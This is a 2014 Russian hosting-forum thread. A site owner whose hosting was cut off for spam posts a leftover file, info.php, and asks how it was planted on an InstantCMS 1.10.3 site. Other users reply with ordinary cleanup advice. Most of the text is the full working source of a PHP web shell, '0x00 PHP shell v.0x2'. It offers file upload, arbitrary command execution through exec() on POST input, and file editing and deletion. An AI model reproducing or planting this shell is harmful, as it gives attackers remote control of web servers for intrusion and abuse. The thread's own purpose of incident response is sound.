X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Отключили хостинг, За рассылку спама
alllffa
alllffa
Topic Starter сообщение 28.4.2014, 19:24; Ответить: alllffa
Сообщение #1


поудалял подозрительные файлы, один остался - info.php
Код
<html>
    <head>
        <title>~ 0x00 PHP shell v.0x2</title>
        <style type="text/css">
            a  {
                text-decoration: none;
                display: block;
            }

            a img  {
                border: 0;
            }

            #view tr:hover  {
                background-color: #900;
            }

            input {
                font-family: Courier New, Courier, Fixed;
                font-size: 10px;
                background-color: #900;
                color: #fff;
            }

            input:hover  {
                background-color: #000;
            }

            textarea {
                font-family: Courier New, Courier, Fixed;
                font-size: 11px;
                background-color: #900;
                color: #fff;
            }

            body  {
                font-family: Courier New, Courier, Fixed;
                font-size: 11px;
                color: #777;
            }

            table#bordered  {
                border: 1px solid #090;
                background-color: #000;
                font-family: Courier New, Courier, Fixed;
                font-size: 11px;
                color: #aaa;
            }

            form#post  {}

            #post .buttons  {
                background-color: transparent;
                font-family: Arial;
                font-size: 11px;
                color: #777;
                border: 0;
            }

            #cell  {
                border-bottom: 1px #090 dotted;
            }
        </style>
    </head>

    <body bgcolor="#000000" background="http://0x00.ath.cx/images/dot.gif" link="#444444" vlink="#444444">
    <h1 style='color: #fff'><u><a href="<?php print $_SERVER['PHP_SELF']; ?>" style="color: #fff">
    ~ 0x00 PHP shell v.0x2</a></u></h1>
        <p style="color: #fff">written by BlackLight<br><br># web: <u><a href="http://0x00.ath.cx" style="display: inline;
        color: #fff">http://0x00.ath.cx</a></u><br> # mail: <u>blacklight[at]autistici[dot]org</u></p><br>

        <table border=0 id="bordered">

<?php
function getperms($f)  {
    $mode=fileperms($f);

    $perm='';
    $perm .= ($mode & 00400) ? 'r' : '-';
    $perm .= ($mode & 00200) ? 'w' : '-';
    $perm .= ($mode & 00100) ? 'x' : '-';
    $perm .= ($mode & 00040) ? 'r' : '-';
    $perm .= ($mode & 00020) ? 'w' : '-';
    $perm .= ($mode & 00010) ? 'x' : '-';
    $perm .= ($mode & 00004) ? 'r' : '-';
    $perm .= ($mode & 00002) ? 'w' : '-';
    $perm .= ($mode & 00001) ? 'x' : '-';

    return $perm;
}

print "<tr><td>~ host </td><td><b>".$_SERVER['SERVER_NAME']."</b></td></tr>";
print "<tr><td>~ server </td><td><b>".$_SERVER['SERVER_SOFTWARE']."</b></td></tr>";
if (is_callable("php_uname"))
    print "<tr><td>~ os </td><td><b>".php_uname()."</b></td></tr>";

if (is_callable("posix_getuid") and is_callable("posix_getgid"))  {
    $uid=posix_getuid();
    $uname=posix_getpwuid($uid);
    $uname=$uname['name'];

    $gid=posix_getgid();
    $gname=posix_getgrgid($gid);
    $gname=$gname['name'];
  
    print "<tr><td>~ uid </td><td><b>$uid ($uname)</b></td></tr>";
    print "<tr><td>~ gid </td><td><b>$gid ($gname)</b></td></tr>";
}

print "</table><br><br>";

if (!isset($_POST['file']))  {
?>

<table border=0 style="font-size: 12px">

<form enctype="multipart/form-data" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
    <input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
    <input type="hidden" name="do_upload" value="true">
        <tr><td>&gt; load a file</td></tr>
        <tr><td><input type="file" name="userfile"/></td></tr>
        <tr><td><input type="submit" value="> send"/></td></tr>
</form>

<tr><td height="20px"></td></tr>

<form action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
        <tr><td>$ execute a cmd</td></tr>
        <tr><td><input type="text" name="cmd"></td></tr>
        <tr><td><input type="submit" value="> execute cmd"></td></tr>
</form>
</table>

<?php
}

#
# Upload di file
#
if ($_POST['do_upload']==="true")  {
    if ($_POST['dir']=="true")
        $dir=$_POST['dirname'];
    else
        $dir=getcwd();

    $uploadfile=$dir."/".basename($_FILES['userfile']['name']);

    if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile))  {
        print "File successfully loaded<br>\n";
        print "~ file name: <b>".$_FILES['userfile']['name']."</b><br>".
            "\n~ type: ".$_FILES['userfile']['type']."<br>\n".
            "~ size: ".$_FILES['userfile']['size']." bytes<br>\n";
    }

    else print "$ Error while loading ".$_FILES['userfile']['name']."<br>\n";
}

#
# Modifica o cancellazione di file
#
if (isset($_POST['dofile']))  {
    $ref=$_SERVER['HTTP_REFERER'];
    $fname=htmlentities($_POST['dofile']);
    $content=$_POST['content'];

    #
    # Modifica
    #
    if (isset($_POST['save']))  {
        if (!($fp=fopen($fname,"w")))
            die ("$ Unable to write to <b>$fname</b><br>\n");

        fputs ($fp,$content);
        fclose($fp);

        print ("File <b>$fname</b> successfully updated<br><br>\n");
    }

    #
    # Cancellazione
    #
    if (isset($_POST['remove']))  {
        unlink ($fname) or die ("$ Unable to remove <b>$fname</b><br>\n");
        print "<b>$fname</b> successfully removed<br><br>\n";
    }
}

#
# Esecuzione di un comando
#
if (isset($_POST['cmd']))  {
    $cmd=$_POST['cmd'];
    $output=array();
    exec ($cmd,$output);

    print "<br><hr height=1 width=\"100%\">\n";
    print "# cmd output: <br><br><tt>";
    print "<div style=\"border: 1px solid #090; background-color: #000; padding: 10px\">\n";

    foreach ($output as $line)
        print "$line<br>\n";
    print "</div></tt>\n";
    die('');
}

#
# Visualizzazione di file
#
if (isset($_POST['fname']))  {
    print "# Warning: editing or removing a file is only possible if you've got the privileges to do that<br><br>";

    $fname=htmlentities($_POST['fname']);
    $file=file($fname) or print "$ Unable to open <b>$fname</b><br>\n";

    print "<form action=\"".$_SERVER['REQUEST_URI']."\" method=\"POST\">\n";
    print "<input type=\"hidden\" name=\"dofile\" value=\"$fname\">\n";
    print "<textarea rows=20 cols=80 name=\"content\">";

    for ($i=0; $i<count($file); $i++)
        print htmlentities($file[$i]);

    print "</textarea><br><br>\n";
    print "<input type=\"submit\" value=\"> Save file\" name=\"save\">\n";
    print "<input type=\"submit\" value=\"> Delete file\" name=\"remove\">\n";
    print "</form>\n";
}

#
# Visualizzazione del contenuto di una directory
#
if (isset($_POST['dirname']))
    $path=htmlspecialchars($_POST['dirname']);
else
    $path=getcwd();

$dp=opendir($path) or die("$ Unable to open <b>$path</b><br>\n");
chdir ($path);
$path=getcwd();

print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
print "<font color=\"white\">&gt; cwd: <b>".getcwd()."</b></font><br><br>\n\n";
$dir=array();

while ($file=readdir($dp))
    if (strcmp(".",$file))
        array_push($dir,"$path/$file");

closedir($dp);
sort($dir);

?>

<form name="post" id="post" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
<table border=0 width="100%" style="border: 1px #090 solid; background-color: #000">
<?php
for ($i=0; $i<count($dir); $i++)  {
    print "<tr style='font-family: Arial; font-size: 11px;'>\n";

    #
    # Directory superiore
    #
    if (basename($dir[$i])==="..")  {
        $tmp=split('/',getcwd());
        $new="";

        for ($j=0; $j<count($tmp)-1; $j++)
            $new .= $tmp[$j]."/";

        print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">UP</td>\n";
        print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"$new\" class=\"buttons\"></td></tr>\n";
    }

    #
    # Directory
    #
    if (is_dir($dir[$i]))  {
        if (basename($dir[$i])!='..')  {
            print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">DIR</td>\n";
            print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"".$dir[$i].
                "\" class=\"buttons\"></td>\n";
            print "<td id=\"cell\">DIR</td></tr>\n";
        }
    }
  
    #
    # File comune
    #
    else  {
        if (basename($dir[$i])!='..')  {
            print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">FILE</td>\n";
            print "<td id=\"cell\"><input type=\"submit\" name=\"fname\" value=\"$dir[$i]\" class=\"buttons\"></td>\n";
            print "<td id=\"cell\">".getperms($dir[$i])."</td></tr>\n";
        }
    }
}

print "</table></div>\n";
?>
      
       </body>
</html>


перейдя по ссылке site.ru/info.php открывается окно в браузере и можно закачать любые файлы на хостинг !
Вопрос как найти дырку через которую туда залили данный фаил ? движок instantcms 1.10.3

Сообщение отредактировал alllffa - 28.4.2014, 19:26


--------------------
Сделай 300% годовых, не напрягаясь. Облачный Майнинг.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mhoster
mhoster
сообщение 29.4.2014, 9:26; Ответить: mhoster
Сообщение #2


alllffa, все как обычно, видимо заразили его вирусом. Движки, плагины, темы обновить из доверенных источников, пароли сменить, старые файлы от скриптов желательно удалить.

Так же следует принять меры:

1. Проверьте локальный компьютер на вирусы. Рекомендую антивирус Kaspersky Internet Security.
2. Смените все пароли
3. Обязательно обновите CMS на актуальную версию
4. В будущем поддерживайте актуальную версию.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
disveper
disveper
сообщение 2.5.2014, 22:36; Ответить: disveper
Сообщение #3


Полностью все сносите и заливайте заново
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 3.5.2014, 10:14; Ответить: kagtus
Сообщение #4


ТС по датам создания и по логам не смотрели??? часто взломщики не заморачиваются на изменение дат...


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Shadow
Shadow
сообщение 5.5.2014, 19:51; Ответить: Shadow
Сообщение #5


Ну и если есть плагины, написанные на заказ, не помешает пробежаться по ним на предмет эксплойтов и уязвимостей.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Хостинг "Hostland" - качественный хостинг по разумным ценам и со своей Панелью Управления
0 artmeteor 397 18.4.2024, 22:46
автор: artmeteor
Горячая тема (нет новых ответов) Услуги хостинг, аренда серверов США, Нидерланды, РФ | RICHHost
110 RICHHost 66918 17.4.2024, 1:30
автор: RICHHost
Горячая тема (нет новых ответов) LITE.HOST - хостинг для тех, кто любит не переплачивать
74 akkyoh 30870 6.4.2024, 19:41
автор: Kseniya_Klimova
Горячая тема (нет новых ответов) Дешевый SSD хостинг на DDR4 с DDOS защитой для 10 сайтов за 69 рублей!
106 HostiMan 70369 2.4.2024, 19:34
автор: HostiMan
Открытая тема (нет новых ответов) Помогу оплатить хостинг
20% с меня!
8 GigArt 3447 13.1.2024, 20:48
автор: SMM2040


 



RSS Текстовая версия Сейчас: 20.4.2024, 3:47
Дизайн